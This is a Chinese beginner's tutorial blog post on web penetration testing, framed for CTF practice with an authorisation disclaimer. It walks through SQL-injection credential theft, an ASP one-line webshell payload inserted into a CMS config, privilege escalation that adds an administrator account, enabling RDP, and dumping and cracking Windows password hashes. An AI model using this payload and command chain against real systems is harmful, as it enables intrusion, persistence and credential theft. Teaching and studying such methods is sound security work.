web渗透测试常规套路

本篇文章旨在给小白白们做一次有关web渗透的科普,其中涉及到的套路、工具可能在如今XX狗、XX盾当道的社会已不再适用,但是其中涉及的思想永远不会过时,其中的工具如菜刀等更是经典之作,即使发布已经10余年认识现在渗透测试网站的不可或缺的利器之一。
另:面向学生的CTF,出题者考虑到学生的实操能力,设计的web题,或者拿服务器找flag的大题大部分用本文介绍的思路、工具就能成功cpature the flag。
说明:作者已获题中出现网站授权,为避免敏感信息泄露,仍会采取打码措施,望学习本文的小伙伴们不要在未获授权、许可的情况下对他人网站进行渗透测试。
0×02
准备工作:
准备好以下工具:御剑、明小子、菜刀、pr、3389、cmd、quarkspwdump等
拿到一个网站,首先我们最容易想到的就是扫描目录。
最常用的工具是御剑,页面如图

在域名空格中输入我们测试的网站的域名,点击开始扫描即可

我们在结果中发现/admin,这疑似后台页面,双击该链接进入,看看判断是否正确

可以看到确实是后台登陆页面
找到后台登陆界面了,接下来我们就需要登陆的用户名和密码了,所以寻找用户名和密码就是我们下一步的工作
这一步我们用到的工具是Domain3.6,界面如图

点击SQL注入—》批量扫描注入点—》添加网址,输入网址

点击OK,然后点击批量分析注入点

得到结果如图

点击OK关闭弹窗,在注入点栏目下随机选择一条,右击选择“检测注入”

如图所示

点击“开始检测”,得到结果如图

点击“猜解表名”

在结果中选择admi

选中admin后点击猜解列名
得到结果如图

Username,password是我们需要的信息,所以在前面的方框中勾选,点击猜解内容,如下图

结果如下图,成功得到用户名和密

不过密码很明显是md5加密后的
我们在Md5在线解密网站中解密即可

得到结果,明文密码为admin888
现在有了用户名和密码,我们就返回后台登陆页面
输入信息后成功登陆

成功进入后台
接下来我们需要获取webshell,这一步仁者见仁智者见智,需要凭借个人的经验来多次尝试分析确定
此处仅提供个人思路
我们点击左侧的“系统设置管理”—》“网站信息配置”

在公司名称处将原信息删除,换成我们的一句话木马
“%><%Eval Request(Chr(35))%><%’
(解释:1.句首和句尾的引号用于闭合语句,2.Request()中的内容即连接菜刀时需要的密码,此处用的Chr(35)指的是ascii值为35的符号,即#,3.Eval Request()是asp一句话木马的常用格式)

点击保存设置
接下来的步骤是连接菜刀
打开菜刀,界面如图

在空白处右键,添加,在弹出框中输入地址及密码(之前说过为#

这里小白白们可能会问了,为什么地址后面的/inc/config.asp之前没有见过呢?
是这样的,这个网站用的是魅力企业网站管理系统(一个cms),我们可以在网上下到它的源码,可以看到它整个的目录结构,自然会明白我们修改的一句话的目录在/inc/config.a
输入信息后点击添加,发现连接成功

注意:一般的CTF比赛,做到这个程度就可以在各个目录里找flag了,不过这次我们把整个渗透流程介绍完
接下来我们需要提权,那么就需要通过菜刀上传提权工具,这里上传的位置要选好,一般而言,c盘的子目录中的文件可执行的可能性较大
提权经典的搭配是cmd+3389+pr,我们这里就用这个组合,同时选定上传目录为C:\RECYCLER

直接将我们需要用到的工具pr,3389,cmd选中后拖进即可

可以看到已经上传成功
选中cmd,右击选择虚拟终端,打开如图所示页面

敲回车后开始输入我们的命令

来切换到我们提权工具所在的目录
我们开始使用pr创建用户,用法如图

注意,虽然pr “net user yale 888 /add”执行后提示命令成功完成,为了确认,我们可以输入pr “net user”确保确实成功添加该用户(用户名yale,密码888)
接下来我们尝试将yale添加到系统管理员组

同理,第二条命令是为了确保添加成功
既然添加成功了,我们接下来就开启3389

我们win+r,打开运行框后输入mstsc,打开远程桌面连接

在空白框中输入ip即可开始连接
点击连接后弹出认证界面,输入我们创建的用户名和密码

点击确定即可成功登陆

接下来我们需要想到这个问题:以后远程登陆难道及靠我们自己创建的帐号吗?要是哪天被管理员发现了,那怎么办,所以长久之计是在获取系统管理员的密码后删除自己创建的用户
那么,接下里我们要做的就是找到系统管理员的密码
我们这里用到的工具是quarksdump,还是和前三个工具一样,拖到菜刀里直接上传

我们在远程连接的服务器中打开cmd窗口

进入recycler目录看到工具已上传

输入quarkspwdump.exe回车后立刻弹出如下窗口

输入如图命令,回车即可得到

我们看到最下面一列是Administrators跟随的一串字符,这其实也是一串hash加密过的密码值(Windows系统下的hash密码格式为:用户名称:RID:LM-HASH值:NT-HASH值),解密得到

密码为cu9e2cgw
渗透测试结束。
0×03
总结:我们这次的演示是一次典型的渗透测试的过程,主要思路为
扫后台—找注入点获取后台登陆密码—上传一句话木马—菜刀连接—提权—拿服务器获取系统管理员密码
用到的工具有:御剑、明小子、菜刀、pr、3389、cmd、quarkspwdump等
0×04

未经允许不得转载:小梦易专享博客-期待每一天更美好 » web渗透测试常规套路

赞 (0)

评论 1

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
  1. missweotr重复了回复